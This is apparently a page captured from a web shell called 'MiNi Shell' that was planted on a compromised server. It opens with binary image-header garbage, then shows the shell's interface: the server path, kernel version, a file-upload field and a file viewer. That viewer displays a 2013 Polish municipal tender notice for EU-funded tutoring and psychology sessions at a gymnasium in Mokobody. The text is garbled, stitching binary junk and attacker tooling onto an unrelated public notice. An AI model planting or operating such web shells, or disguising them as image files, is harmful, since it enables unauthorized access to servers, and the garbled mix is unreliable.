JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131016/216087-N-2013.html

<p class="kh_header"><b>Mokobody: Usługi edukacyjne w ramach projektu  WIEDZA - DROGĄ KU PRZYSZŁOŚCI  współfinansowanego przez Unię Europejską
ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 216087 - 2013; data zamieszczenia: 16.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Mokobody , Plac Chreptowicza 25, 08-124 Mokobody, woj. brak, tel. 025 6411323.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mokobody.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne w ramach projektu  WIEDZA - DROGĄ KU PRZYSZŁOŚCI  współfinansowanego przez Unię Europejską
ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie zajęć dydaktyczno - wyrównawczych oraz zajęć (w tym z doradztwa zawodowego) i konsultacji z psychologiem, z uczniami gimnazjum (w tym, z młodzieżą  posiadającą orzeczenie o potrzebie kształcenia specjalnego) w ramach projektu WIEDZA- DROGĄ KU PRZYSZŁOŚCI POKL.09.01.02-14-139/12 w ramach Programu Operacyjnego Kapitał Ludzki, Działania 9.1.Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Podziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego. Projekt realizowany jest w okresie od 01.08.2013 r. do 30.06.2015r. Zajęcia prowadzone będą w Gimnazjum im. Marszałka Józefa Piłsudskiego w Mokobodach.
Głównym celem projektu WIEDZA-DROGĄ KU PRZYSZŁOŚCI jest wyrównanie szans edukacyjnych uczniów Gimnazjum w Mokobodach poprzez umożliwienie młodzieży wykazującej problemy w nauce oraz zachowaniu uczestnictwa w dodatkowych zajęciach dydaktyczno-wyrównawczych i wyjazdach edukacyjnych, zajęciach z psychologiem oraz rozszerzenie oferty szkoły o zagadnienia związane z poradnictwem i doradztwem edukacyjno-zawodowym.
Zamawiający przewidział 8 niezależnych części tj:

Cześć I. Nowy język- nowy świat
Przeprowadzenie łącznie 156 zajęć dydaktyczno-wyrównawczych z języka angielskiego ukierunkowanych na nadrabiane zaległości, tłumaczenie zagadnień gramatycznych, utrwalenie nowego słownictwa, ćwiczenie umiejętności językowych ze słuchania, czytania, reagowania językowego oraz rozwiązywanie zadań egzaminacyjnych. 132 zajęcia zostaną przeprowadzone z użyciem tablicy interaktywnej, 24 zajęcia w sali komputerowej z wykorzystaniem programu do nauki języka. Podczas zajęć zostaną wykorzystane m. in: nowoczesne oprogramowanie, interaktywne ćwiczenia, elementy gry zabawy. Zajęcia będą prowadzone w każdym roku szkolnym w sześciu grupach. Liczebność grup: 2 grupy 5-osobowe, 4 grupy 8-osobowe.

Cześć II. Nie tylko kreda i tablica
Przeprowadzenie łącznie 78 zajęć dydaktyczno-wyrównawczych z matematyki ukierunkowanych na wyrównywanie poziomu wiedzy, utrwalanie bieżącego materiału, przygotowywanie do nowej formuły egzaminu. Zajęcia będą się odbywały z wykorzystywaniem gier matematycznych, modeli figur, siatek i brył, przeprowadzaniem testów interaktywnych w pracowni komputerowej(12 zajęć). Osoba prowadząca zajęcia będzie udzielała Informacji Zwrotnej właściwej dla Oceniania Kształtującego (co uczniowie już potrafią, nad czym i w jaki sposób muszą popracować). Zajęcia będą prowadzone w każdym roku szkolnym w trzech grupach. Liczebność grup: 1 grupa 5-osobowa, 2 grupy 8-osobowe.

Cześć III. Nie tylko kreda i tablica
Przeprowadzenie łącznie 78 zajęć dydaktyczno-wyrównawczych z matematyki ukierunkowanych na wyrównywanie poziomu, utrwalanie bieżącego materiału, przygotowywanie do nowej formuły egzaminu. Zajęcia będą się odbywały z wykorzystywaniem gier matematycznych, modeli figur, siatek i brył, oprogramowania, tablicy interaktywnej (39zajęć) i przeprowadzaniem testów interaktywnych w pracowni komputerowej(12 zajęć). Osoba prowadząca zajęcia będzie udzielała Informacji Zwrotnej właściwej dla Oceniania Kształtującego (co uczniowie już potrafią, nad czym i w jaki sposób muszą popracować). Zajęcia będą prowadzone w każdym roku szkolnym w trzech grupach. Liczebność grup: 1 grupa 5-osobowa, 2 grupy 8-osobowe.

Cześć IV. Zabawa w teatr
Przeprowadzenie łącznie 78 zajęć dydaktyczno-wyrównawczych z języka polskiego. 12 zajęć zostanie przeprowadzonych w pracowni komputerowej (rozwiązywanie testów) a 66 zajęć będzie realizowanych w oparciu o zabawę w teatr, co daje uczniom szerokie możliwości rozwoju poprzez: czytanie tekstu ze zrozumieniem, ćwiczenia dykcyjne, interpretacyjne, kształtowanie wyobraźni, umiejętność zaprezentowania się przed publicznością (ośmielanie się), ćwiczenie dyscypliny i odpowiedzialności, pracy w grupie, dbałość o kulturę słowa, rozwijanie zainteresowań, podnoszenie własnej samooceny. Efekty pracy, będą upublicznione w postaci 6 przedstawień. Uczniowie podwyższą własną samoocenę i poczucie wartości, będą pokonywać tremę przed wystąpieniem publicznym. Zajęcia będą prowadzone w każdym roku szkolnym w trzech grupach. Liczebność grup: 1 grupa 5-osobowa, 2 grupy 8-osobowe.

Cześć V. Konsultacje/ zajęcia z psychologiem oraz poradnictwo i doradztwo edukacyjno-zawodowe
Przeprowadzenie łącznie112 zajęć z psychologiem, które będą dotyczyły: wyboru przyszłej ścieżki zawodowej (12), poszerzenia wiedzy o samym sobie i swoich wartościach, niwelowania kompleksów, wygaszania negatywnych emocji, radzenia sobie ze stresem, zwiększania akceptacji społecznej, samooceny, motywacji do działania, poszerzenia wiedzy z zakresu komunikacji interpersonalnej (100). W czasie lekcji/konsultacji uczniowie nabędą umiejętności radzenia sobie ze stresem, jak podnosić poziom samooceny, jak pokonywać stres i tremę, będą mieli świadomość wyboru przyszłej ścieżki zawodowej. Zajęcia będą prowadzone w każdym roku szkolnym w 9 grupach liczących do 24 osób. Konsultacje indywidualne będą prowadzone w zależności od zgłaszanych potrzeb. 

Cześć VI. Z chemią za pan brat
Przeprowadzenie łącznie 78 zajęć z chemii przeznaczonych dla uczniów z trudnościami dydaktycznymi, z zamiarem wyrównania przez nich braków w podstawowych wiadomościach i umiejętnościach zdobytych na lekcjach oraz utrwalania nowych. Podczas zajęć zostanie położony nacisk na wdrażanie aktywnych metod badawczych sprzyjających zdobywaniu i utrwalaniu wiedzy. Zajęcia będą prowadzone w atrakcyjnej formie, poprzez: ćwiczenia modelowe, gry dydaktyczne(5), projektowanie i przeprowadzanie doświadczeń (15), obliczenia chemiczne, przeprowadzanie testów interaktywnych w pracowni (12zajęć). Uczniowie będą badać właściwości chemiczne i fizyczne substancji, odróżniać je od siebie, sprawdzać ich aktywność chemiczną, identyfikować. Uczniowie będą rozwijać umiejętności interpersonalne, komunikowania się, będą przełamywali niechęć do nauki. Zajęcia będą prowadzone w każdym roku szkolnym w sześciu grupach. Liczebność grup: 2 grupy 5-osobowe, 4 grupy 8-osobowe.

Cześć VII. Język polski
Przeprowadzenie łącznie 78 zajęć z języka polskiego, których celem będzie wyrównywanie braków w podstawowych wiadomościach wynikających z programu nauczania, przeciwdziałanie trudnościom w rozumieniu i interpretacji tekstów, motywowanie do samodzielnej, systematycznej pracy, kształcenie podstawowych umiejętności. W czasie zajęć będzie doskonalone czytanie ze zrozumieniem, technika czytania głośnego, interpretacja tekstów, umiejętności poprawnego wypowiadania się pisemnie, z uwzględnieniem zasad ortografii i interpunkcji, oraz ustnie, uczniowie będą rozwiązywali testy interakcyjne (12 zajęć w pracowni). Zajęcia będą miały też za zadanie przywrócić uczniowi wiarę we własne możliwości, wskazać mu drogę dalszego rozwoju, zapobiegać niepowodzeniom szkolnym. Zajęcia będą prowadzone w każdym roku szkolnym w trzech grupach. Liczebność grup: 1 grupa 5-osobowa, 2 grupy 8-osobowe.

Cześć VIII. Fizyka
Przeprowadzenie łącznie 78 zajęć, na których uczniowie będą wyrównywać zaległości, braki pojawiające się podczas realizacji programu nauczania fizyki. Osoba prowadząca będzie udzielała im pomocy w zakresie przyswajania i przetwarzania zdobytej wiedzy, w dokonywaniu obserwacji i wyciągania właściwych wniosków z analizowanych problemów, wykorzystywania wiedzy w praktyce do planowania i przeprowadzania eksperymentów, których zostanie przeprowadzonych 6. Uczniowie będą uczyć się jak prawidłowo posługiwać się pojęciami fizycznymi, rozwiązywać zadania, testy (w tym interakcyjne-12 zajęć w pracowni), wyjaśniać: pojęcia, prawa , zjawiska fizyczne, analizować teksty, pozyskiwać wiadomości z dostępnych źródeł. Pobudzi to ich do samodzielnego i logicznego myślenia, rozwinie w nich zdolności poznawcze, wiarę w swoje możliwości, stworzy sytuacje, w których uczeń osiągnie postępy i sukcesy w nauce. Stosowane będą różne metody aktywizujące, formy pracy, pomoce i środki dydaktyczne (między innymi będą pokazywane uczniom na ekranie zadania, schematy doświadczeń, podstawowych pojęć, zjawisk modelowych przygotowanych i zebranych do prezentacji za pomocą komputera). Zajęcia będą prowadzone w każdym roku szkolnym w sześciu grupach. Liczebność grup: 2 grupy 5-osobowe, 4 grupy 8-osobowe.

Wykonanie zleconych zadań odbywać się będzie w Gimnazjum im. Marszałka Józefa Piłsudskiego przez czas trwania umowy, tj. od chwili podpisania umowy do 31.05.2015r. we wskazane dni tygodnia wg opracowanego harmonogramu zajęć dostosowanego do możliwości placówki, w której odbywać się będą zajęcia w godzinach popołudniowych oraz w dni wolne od pracy. W przypadku kolizji, świadczenie na rzecz Zamawiającego posiada pierwszeństwo przed świadczeniami na rzecz osób trzecich.

Obowiązki osoby prowadzącej zajęcia dydaktyczno -wyrównawcze:
a) opracowanie autorskiego programu zajęć dostosowanego do poziomu uczestników zajęć, uwzględniającego zapisy projektu dotyczące form i metod pracy, wykorzystania IT, przygotowania i przeprowadzania testów diagnostycznych
b) przeprowadzanie analizy wyników osiągnięć edukacyjnych;
c) prowadzenie zajęć zgodnie z opracowanym przez koordynatora projektu harmonogramem;
d) systematyczne uzupełnianie dokumentacji projektowej oraz prowadzenie sprawozdawczości;
e) prowadzenie zajęć pozalekcyjnych- w terminie do 31 maja 2015 w grupach 5 lub 8-osobowych;
f) prowadzenie obserwacji pracy uczestników zajęć;
g) dokumentowanie zajęć pozalekcyjnych (prowadzenie dzienników zajęć, list obecności, uzupełnianie kart czasu pracy);
h) ścisła współpraca z koordynatorem i asystentem koordynatora;
i) uczestnictwo w wyznaczonych spotkaniach z zespołem projektowym;
j) przekazywanie informacji uczestnikom zajęć o współfinansowaniu zajęć ze środków Europejskiego Funduszu Społecznego.

Obowiązki psychologa prowadzącego zajęcia (w tym z doradztwa zawodowego) oraz konsultacje:
a) opracowanie autorskiego programu zajęć uwzględniającego zapisy dotyczące realizacji Konsultacji  zajęć z psychologiem oraz poradnictwem i doradztwem edukacyjno-zawodowym;
b) prowadzenie zajęć zgodnie z opracowanym przez koordynatora projektu harmonogramem;
c) systematyczne uzupełnianie dokumentacji projektowej oraz prowadzenie sprawozdawczości;
d) prowadzenie zajęć - w terminie do 31 maja 2015 r. w każdym roku  w 9 grupach do 24 osób;
e) prowadzenie konsultacji w zależności od zgłaszanych potrzeb;
f) dokumentowanie zajęć (prowadzenie dzienników zajęć, list obecności, kart czasu pracy);
g) ścisła współpraca z koordynatorem i asystentem koordynatora;
h) uczestnictwo w wyznaczonych spotkaniach z zespołem projektowym;
i) przekazywanie informacji uczestnikom zajęć o współfinansowaniu zajęć ze środków Europejskiego Funduszu Społecznego.


Z Wykonawcą Wykonawcami przyjmującym obowiązki realizatora zajęć oraz zajęć i konsultacji psychologicznych w ramach projektu WIEDZA- DROGĄ KU PRZYSZŁOŚCI, zostanie podpisana umowa.
Wykonawców obowiązuje należyta staranność w wykonywaniu przedmiotu zamówienia. 
W razie stwierdzenia uchybień w należytym wykonywaniu przedmiotu zamówienia Zamawiający zastrzega sobie możliwość rozwiązania umowy w trybie natychmiastowym.
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawców podczas wykonywania przedmiotu zamówienia.

Na potrzeby niniejszego przetargu określa się:
 Jednostka 1 godzina lekcyjna używana w SIWZ odpowiada czasowo 45 minutom. 
Planowany czas pracy psychologa- 1godzina to 60 minut..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia (na podstawie art. 44 Prawo Zamówień Publicznych).
Ocena spełnienia warunków udziału w postępowaniu będzie dokonywana na podstawie dokumentów i oświadczeń złożonych wraz z ofertą wg zasady: spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania wiedzy i doświadczenia, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia (na podstawie art. 44 Prawo zamówień publicznych).Ocena spełnienia warunków udziału w postępowaniu będzie dokonywana na podstawie dokumentów i oświadczeń złożonych wraz z ofertą wg zasady: spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący dysponowania odpowiednim potencjałem technicznym jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia (na podstawie art. 44 Prawo zamówień publicznych).Ocena spełnienia warunków udziału w postępowaniu będzie dokonywana na podstawie dokumentów i oświadczeń złożonych wraz z ofertą wg zasady: spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia jeżeli dysponuje co najmniej 1 osobą (do każdej części) zdolną do wykonania zamówienia, która posiada kwalifikacje niezbędne do wykonania zamówienia, tzn. posiada wykształcenie zgodne z ustawą o systemie oświaty i KN lub Wykonawca posiada niezbędne kwalifikacje tj. wykształcenie zgodne z ustawą o systemie oświaty i KN. Ocena spełnienia warunków udziału w postępowaniu będzie dokonywana na podstawie dokumentów i oświadczeń złożonych wraz z ofertą wg zasady: spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w zakresie sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oswiadczenie o spełnieniu  warunków udziału w postępowaniu o udzielenie  zamówienia zgodnie z załącznikiem nr 2 do siwz</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.mokobody.pl; http://www.mokobody.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Mokobody,ul. Plac Chreptowicza  25, 08-124 Mokobody pokój nr 16 
( pierwsze piętro) od poniedziałku do piątku od godz. 8.00 do godz. 16.00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2013 godzina 11:40, miejsce: Gimnazjum im. Marszałka Józefa Piłsudskiego
Adres: ul. Szkolna 14, 08-124 Mokobody - sekretariat pokój nr 15 parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki, Działania 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Podziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Nowy język- nowy świat.</p>
